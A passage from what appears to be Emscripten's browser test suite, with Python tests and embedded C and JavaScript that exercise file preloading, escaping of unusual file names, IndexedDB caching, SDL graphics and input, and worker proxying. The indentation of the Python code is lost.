create_test_file(src, self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
self.compile_btest([src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g4', '-o', 'page.html', '-s', 'DEMANGLE_SUPPORT=1', '-s', 'WASM=0'])
self.run_browser('page.html', None, '/report_result?1')
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_test_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_test_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_test_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_test_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
create_test_file('src.cpp', self.with_report_result(open(os.path.join(path_from_root('tests/manual_download_data.cpp'))).read()))
create_test_file('file.txt', '''Hello!''')
self.compile_btest(['src.cpp', '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
run_process([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt'))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_test_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_test_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
run_process([PYTHON, FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
ensure_dir(os.path.join('subdirr', 'moar'))
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_test_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
'''))
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
'''))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_test_file('data.txt', 'data')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl_image.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl_image.c', '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
self.compile_btest([
'sdl_image_jpeg.c', '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_test_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy(self):
# we modify the asm.js, this is a non-wasm test
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut', '-s', 'WASM=0'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates above test, but verifies we can run outside of the btest harness
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
def copy(to, js_mod, html_mod=lambda x: x):
create_test_file(to + '.html', html_mod(open('test.html').read().replace('test.js', to + '.js')))
create_test_file(to + '.js', js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_test_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def get_async_args(self):
if self.is_wasm_backend():
return ['-s', 'ASYNCIFY']
else:
return ['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1']
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1'] + self.get_async_args()
]:
print(delay, defines, async_)
create_test_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
create_test_file('sdl_key.c', self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
self.compile_btest(['sdl_key.c', '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_test_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl_text.c', self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
self.compile_btest(['sdl_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
